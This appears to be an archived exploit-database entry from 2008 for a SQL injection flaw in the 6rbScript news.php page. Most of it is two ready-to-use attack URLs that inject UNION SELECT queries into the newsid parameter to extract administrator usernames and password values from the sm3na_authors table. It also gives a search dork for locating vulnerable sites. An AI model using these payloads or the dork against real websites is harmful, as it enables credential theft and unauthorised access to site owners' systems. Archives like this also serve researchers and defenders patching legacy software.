[] NeoSense

6rbScript - 'news.php' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2008-05-20 
date_updated: 2016-11-30 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

##########################################################
#
#	6rbScript SQL Injection Vulnerability
#
#	by Hussin X
#
#	Home: www.tryag.cc/cc
#
#	darkangel_g85[at]Yahoo[DoT]com
#
#       DoRK: Powered by 6rbScript
##########################################################


##########################################################

Exploit:

PWD

http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--

USER

http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--




###########################################################

Greetz: All IRAQI And all HACKER

###########################################################

# milw0rm.com [2008-05-21]